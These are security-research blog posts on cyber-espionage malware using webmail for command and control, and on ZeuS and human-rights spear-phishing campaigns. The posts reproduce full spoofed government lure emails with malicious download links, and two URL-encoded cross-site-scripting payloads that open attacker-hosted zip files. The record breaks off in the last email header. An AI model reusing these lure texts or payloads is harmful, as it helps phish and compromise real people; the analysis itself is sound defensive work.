Posts tagged “Social Engineering”

Command and Control in the Cloud



In “Shadows in the Cloud: An investigation into cyber espionage 2.0” my co-authors and I analyzed the command and control infrastructure of a network that extracted secret, confidential and restricted documents from the Indian government and military. The Shadow Network used a complex and tiered command and control infrastructure that leveraged Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. As we noted in the report, the use of these services as elements of command and control is certainly not new:

The use of social networking sites as elements of command and control for malware networks is not novel. The attackers leverage the normal operation of these systems in order to maintain control over compromised system. In 2009, researchers found that Twitter, Jaiku, Tumblr, Google Groups, Google AppEngine and Facebook had all been used as the command and control structure for malware. In August 2009, Arbor Networks’ Jose Nazario found that Twitter was being used as a command and control component for a malware network. In this case, the malware was an information stealer focused on extracting banking credentials from compromised computers located mostly in Brazil. Twitter was not the only channel being used by the attackers. They also used accounts on Jaiku and Tumblr (Nazario 2009a). Furthermore, Arbor Networks found another instance of malware that used the Google AppEngine to deliver malicious URLs to compromised computers (Nazario 2009b). The Unmask Parasites blog found that obfuscated scripts embedded in compromised web sites used the Twitter API to obscure their activities. While the method was clever, the code was unreliable and appeared to have been abandoned by the attackers (Unmask Parasites 2009). Symantec found that Google Groups were being used as command and control for another instance of malware. In this case, a private Google group was used by the attackers to send commands to compromised computers which then uploaded their responses to the same Group (Symantec 2009a) Symantec also found an instance of malware that used Facebook status messages as a mechanism of command and control. (Symantec 2009b). The use of these social networking and Web 2.0 tools allows the attackers to leverage the normal operation of these tools to obscure the command and control functions of malware.

Earlier this year, Sunbelt found a Twitter botnet creator and Trend Micro reports that the “Here You Have” worm used GMail accounts. As we found with the Shadow Network malware authors learn from each other. And in the case of the Shadow Network they didn’t just use one service they used six of them, including Yahoo! Mail. And while indiscriminate malware may be rather noisy, the malware used in targeted attacks tends to be (but is certainly not always) more discrete.

A recent sample posted at contagiodump.blogspot.com caught my attention for this very reason. The sample, “Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf” (which was sent from 221.9.247.17 and was detected by 14 /43 (32.6%) AV products at Virustotal) arrived with the subject line “Nuclear Challenges and Responses in the Century” and exploited a vulnerability in Adobe Reader/Acrobat (CVE-2010-2883) to drop malware on the targets’ computers. For those of you who follow Mila’s awesome blog, this scenario is hardly surprising.

But a few things caught my attention. There were references in the strings dumped from a file the malware created (syschk.ocx) that referenced GMail (mail.google.com) and DriveHQ (drivehq.com), which describes itself as a “cloud based storage, backup, group sharing and collaboration service.” When you look at the traffic generated by the malware you’ll see connections to these locations.

There is nothing about these locations that is very suspicious — everyone checks their GMail right? Moreover, the connection to GMail is SSL encrypted.

Using Burp (which made the process very simple) I MITM’d the traffic between the malware and GMail. The malware logs in to the GMail account and sends an email to another GMail address. The content of this email is encrypted. However, I believe that what it is sending — although this is just a hunch — is the content of another file the malware generates: form.ocx. This file contains what appears to be a unique ID assigned by the malware, the hostname and IP address, the default home page of the default browser and a listing of installed programs on the computer. The end of the file contains information about executables the malware has impacted. In addition to the encrypted message sent through the GMail account, the Unique ID in form.ocx appears at the beginning of the message.

IEXPLORE.EXE done
CHROME.EXE done
FIREFOX.EXE done

C:\WINDOWS\system32\form.ocx
Infect OK!

I have not looked into what exactly the malware does to these applications, but it basically disables the operation of FireFox and Chrome and instead connect to the Gmail account when you try to start these applications. Internet Explorer seems to function normally.

The connection to fuechei.chang.drivehq.com results in the download of an additional file rename.ocx which appears to be very similar, when its strings are compared with, syschk.ocx. It then renames syschk.ocx to syschk.ocx1. You can see that this correlates with text in the strings dumped from syschk.ocx.

%s\rename.ocx

http://%s/rename

%s\syschk.ocx1

After the initial connections to GMail and DriveHQ the malware went quiet. I never did get it to connect again.

As network defenses continue to include traffic analysis, I believe that we will continue to see a move toward using popular services, especially web mail as command and control elements. Unlike connections to well-known dynamic DNS services like 3322.org or abnormal connections to geographic regions, connections to GMail and other popular services do not necessarily stand out. Moreover, the connections to the services, such as GMail are encrypted, further obfuscating the malicious activity that is occurring.

Crime or Espionage? Part 2



In “Crime or Espionage Part 1” I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and continuing until late August 2010. In addition, these attacks have been linked to infrastructure used by the Kneber botnet, a ZeuS-based botnet discovered by Netwitness.

This post is an overview of a collection of publicly available emails associated with these ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers’ malicious code. While the attacks are not targeted down to the individual, or even institutional level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues.

The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr’s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues with some messages making use of classification markings such as “U//FOUO” and official looking email footers in order to appear to be legitimate.

The links in to the malicious files contained within the emails make use of a variety of hosts. The attackers will often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. The attackers also use compromised legitimate websites, many of which are running the Joomla! CMS. However, at other times the attackers have used domain names registered specifically for malicious purposes:

dnicenter.com – abuseemaildhcp@gmail.com
dhsorg.org – hilarykneber@yahoo.com

The email addresses abuseemaildhcp@gmail.com and hilarykneber@yahoo.com are well known and have been used to register numerous domain names associated with malware, mostly ZeuS.

The “hilarykneber@yahoo.com” email address was made famous by discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising as any large botnet is likely to have compromised some government computers. But, the recognition of this fact may be the catalyst for the series of attacks using intelligence, military and security themes as lure. Not all compromised computers are of the same value, surely the attackers realize this. In “Conversations With a Blackhat” RSnake outlines this scenario:

There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

A variation of this is a scenario in which the botmaster grows the botnet but through means that increase the chances of compromising a target of interest that “badguy1″ wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting in with the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that’s been stolen or sell access to any sensitive compromised computer.

The emails below are a collection of publicly available emails associated with a series of ongoing of attacks using Zeus.

December 9, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html

From: ecu@nsa.gov
Date: December 9, 2009 4:33:51 PM GMT+05:00
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS

AFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009

CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)

INFORMATION SUBJECT TO EXPORT CONTROL LAWS

WARNING – This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.

DESTRUCTION NOTICE – For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.

Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.

Download:

http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip

or

http://rapidshare.com/files/318309046/CYBERCAFE.zip.html

http://www.sendspace.com/file/fmbt01

December 14, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&viscount=14&expand=1

From: uctd@nsa.gov
Date: December 14, 2009 1:56:24 PM GMT+05:00
Subject: Information Systems Security Reminder

Information Systems Security Reminder

— Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.

— Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including “shoulder surfing” by nearby persons.

— When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.

— If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.

Security Software:

http://hkcaregroup.com/modlogan/MILSOFT.zip

or

http://rapidshare.com/files/320369638/MILSOFT.zip.html

http://fcpra.org/downloads/MILSOFT.zip

February 10, 2010
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/

From: jeffreyc@greylogic.us
Date: Wednesday, February 10, 2010 7:34 AM
Subject: Russian spear phishing attack against .mil and .gov employees

Russian spear phishing attack against .mil and .gov employees

A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://fcpra.org/downloads/winupdate.zip

or

http://www.sendspace.com/file/tj373l

___________
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us

February 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg12517.html

From: jeffreyc@nsa.gov
Date: February 11, 2010 9:39:15 AM GMT+05:00
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .mil

Zeus Attack Spoofs NSA, Targets .gov and .mil

Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.

According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.

The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/7jmxtq

February 12, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security

From: apacs@pentagon.af.mil
Date: 12 Feb 2010 20:41:01 (GMT)
Subject: DoD Roles and Missions in Homeland Security

Defense Science Board

DoD Roles and Missions in Homeland Security

VOLUME II – A: SUPPORTING REPORTS

This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.

Download:

http://mv.net.md/dsb/DSB.zip

or

http://www.sendspace.com/file/rdxgzd

___________
Office of the Under Secretary of Defense
For Acquisition, Technology, and Logistics
Washington, D.C. 20301-3140

February 21, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg25834.html

From: cttd@fbi.gov
Date: February 21, 2010 7:37:16 AM GMT+05:00
Subject: INTELLIGENCE BULLETIN

FEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN

February 2010

Weapons of Mass Destruction Directorate

Indicators for Terrorist Use of Toxic Industrial Chemicals

THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.

UNCLASSIFIED//FOR OFFICIAL USE ONLY

Download:

http://timingsolution.com/Doc/BULLETIN.zip

or

http://www.sendspace.com/file/goz3yd

___________
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.

March 6, 2010
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam

Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e

________________
Office of the Director of National Intelligence Washington, D.C. 20511

* The actual URL is: http://dnicenter.com/docs/report.zip

March 7, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only—dprk-missile-attack-on-japan
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email

From: SSC@dia.mil
Date: 7 Mar 2010 14:17:51 (GMT)
Subject: FOR OFFICIAL USE ONLY

Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22

________________
Office of the Director of National Intelligence
Washington, D.C. 20511

* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip

March 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html

From: hsi@dhs.gov
Date: March 11, 2010 11:38:56 PM GMT+05:00
Subject: U.S. Department of Homeland Security

Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

11 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://dhsorg.org/docs/instructions.zip

________________
U.S. Department of Homeland Security
Washington, DC 20528

March 13, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified

From: NSI@dhs.gov
Date: 13 Mar 2010 18:26:54 (GMT)
Subject: RE: Instructions UNCLASSIFIED

U.S. Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

13 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
______________________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
______________________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://www.sendspace.com/file/h96uh1

or

http://depositfiles.com/files/xj1wvamc4

________________________________________
U.S. Department of Homeland Security
Washington, DC 20528

June 16, 2010
Source: http://www.clearancejobs.com/security_tips.php

From: rss@stratcom.mil
Date: Wed Jun 16 13:10:08 2010
Subject: From STRATCOM to

,

United States Strategic Command

Commanders Reading List

Professional development is essential to the successful execution of our mission – to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander’s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.

All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.

Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.

KEVIN P. CHILTON
General, USAF
Commander

Inside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)

This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)

Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec’s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.

Additional information can be found in the following report:

http://tiesiog.puikiai.lt/report.zip

http://somashop.lv/report.zip

________________________________________
To report a problem please submit an ODNI/ICES Ticket
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)”

June 17, 2010
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html

From: izhar.mujaddid@pentagon.af.mil
Date: Thursday, June 17, 2010 – 11:57 am
Subject: Scientific Advisory Board

UNCLASSIFIED//FOR OFFICIAL USE ONLY

United States Air Force

Scientific Advisory Board

Report on Defending and Operating in a Contested Cyber Domain

Executive Summary and Annotated Brief
SAB-TR-10-01
June 2010

This report is a product of the United States Air Force Scientific Advisory
Board Study Committee on Defending and Operating in a Contested Cyber
Domain. Statements, opinions, findings, recommendations and conclusions
contained in this report are those of the Study Committee and do not
necessarily represent the official position of the United States Air Force or the United States Department of Defense.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
HQ USAF/SB
1180 AF PENTAGON RM 5D982
WASHINGTON, DC 20330-1180

June 17, 2010
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936

From: tsa@dhs.gov
Date: 2010-06-17 18:01:16 GMT
Subject: (U) Transportation Security Administration

UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U) Transportation Security Administration

(U) Terrorist Attack Methods in Airport Terminals

A Predictive Analysis for the Detection-Technology Community

15 June 2010

(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)
assessment, developed at the request of the TSA Office of Security Technology,
examines the terrorist tactics used to attack passengers inside the public areas of an
airport terminal in order to assist in developing security procedures and deploying threat
detection technology to this area. This assessment examined a number of unclassified
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults
conducted in the public areas of airports from the 1960s to the present. Additionally,
attacks on other critical infrastructure targets were reviewed in order to assess which
tactics are more likely to be considered by terrorists targeting airport terminals.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
Department of Homeland Security
Office of Infrastructure Protection
Infrastructure Security Compliance Division
Mail Stop 8100
Washington, DC 20528

* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116

August 26, 2010
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html

From: ifc@ifc.nato.int
Date: Thu, 26 Aug 2010 08:24:30 -0500
Subject: From Intelligence Fusion Centre

Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB

FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU

Additional information can be found in the following report:

http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip

> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia – operation
> “Atalanta”, is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> – the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> – the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS – EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319

Human Rights and Malware Attacks



Human Rights and Malware Attacks

by Nart Villeneuve

On March 18, 2010, unknown attackers sent a spear phishing email that appeared to be from Sharon Hom, the Executive Director of Human Rights in China (HRIC), to a variety of organizations and individuals. Leveraging the trust and recognition of HRIC, the attackers’ email encouraged recipients to visit a compromised website that contained malicious code designed to allow the attackers to ultimately take full control of the visitor’s computer. These targeted malware attacks are now becoming commonplace, further extending the threat faced by civil society organizations.


UPDATE

One of the domains used in this attack, humanright-watch.org, has been used in a variety of attacks and has been documented by Mila at contagiodump.blogspot.com.


Introduction

Internet censorship is but one component of “a matrix of control” that acts to restrict and control information flow in China. The combination of censorship along with surveillance aims to influence behavior toward self-censorship so that most will not actively seek out banned information, let alone the means to bypass these controls. Those engaged in political activities and those who vocally oppose repressive policies such as censorship may be subjected to a complex set of threats—not simply censorship.

A 2008 report titled Breaching Trust: An Analysis of Surveillance and Security Practices on China’s TOM-Skype Platform uncovered that Skype and its Chinese partner Tom Online operated a surveillance network which insecurely captured millions of records including contact details for any text chat and/or voice calls and the full text of sensitive chat messages. A large portion of these captured messages concerned a political campaign that urged Chinese citizens to quit the Communist Party.

There have been an increasing number of targeted malware attacks against civil society organizations, human rights groups, media organizations, and Tibetan supporters. Typically, the targeted user receives an email, possibly appearing to be from someone they know who is a real person within his or her organization, with some text—sometimes specific, sometimes generic—that urges the user to open an attachment (or visit a web site), usually a PDF or Microsoft Office document .

If the user opens the attachment with a vulnerable version of Adobe Reader or Microsoft Office (other types of software are also being exploited) and no other mitigations are in place, their computer will likely be compromised. A clean version of the document is typically embedded in the malicious file and is opened upon successful exploitation so as not to arouse suspicion of the recipient.

Then the user’s computer checks in with a command and control server. At this point, the attacker has full control of the user’s system. The attacker can steal documents, email and send other data, or force the compromised computer to download additional malware and possibly use the infected computer as a mechanism to exploit the victim’s contacts or other computers on the target network.

In the last year, the Information Warfare Monitor has uncovered two cyber-espionage networks, investigated numerous targeted malware attacks, and published two reports: Tracking GhostNet: Investigating a Cyber Espionage Network and Shadows in the Cloud: An Investigation into Cyber Espionage 2.0.

The first, GhostNet, was a network of over 1200 compromised computers spread across 103 countries, 30 percent of which we identified and determined to be “high-value” targets, including ministries of foreign affairs, embassies, international organizations, news organizations, and a computer located at NATO headquarters. While we were able to determine that these entities had been compromised, we were only able to theorize about what type of data the attackers were able to acquire.

Our follow-up investigation uncovered the Shadow Network, and unlike GhostNet we were able to acquire the data stolen by the attackers. We were able to access just one portion of the Shadow Network that was primarily focused on extracting sensitive information from India. We recovered a wide variety of documents, including one document that appeared to be encrypted diplomatic correspondence, two documents marked “SECRET,” six as “RESTRICTED,” and five as “CONFIDENTIAL” which appear to belong to Indian government entities including the National Security Council Secretariat (NSCS) of India, the Embassy of India, Kabul, the Embassy of India, Moscow, the Consulate General of India, Dubai, and the High Commission of India in Abuja, Nigeria. We also recovered documents including 1,500 letters sent from the Dalai Lama’s office between January and November 2009.

The nature of the compromised entities and the data stolen by the attackers do indicate correlations with the strategic interests of the People’s Republic of China, but, we were unable to determine any direct connection between these attackers and elements of the Chinese state.

Investigation

Summary

On March 18, 2010, attackers sent a “spear phishing” email that appeared to originate from Sharon Hom’s email account to several different organizations and individuals. The subject of the email was “Microsoft, Stool Pigeon for the Cops and FBI” and the email contained a JPG attachment. However, the attackers’ objective was for the targets to visit the link contained in the email. The link, www.cfcr2008.org, redirected to cfcr.i1024.com which was compromised by the attackers and in which they had inserted code that caused visitors to the website to open a malicious PDF from www.520520.com.tw. This PDF exploited Adobe Reader and compromised the visitors computer. Compromised computers then connected to a website under the attackers’ control, www.humanright-watch.org, and downloaded additional malware before ultimately connecting to a command and control server, 360liveupdate. com, in China.

Spoofed Email

From: Sharon Hom <mailto:sharonhom@hrichina.org>
To
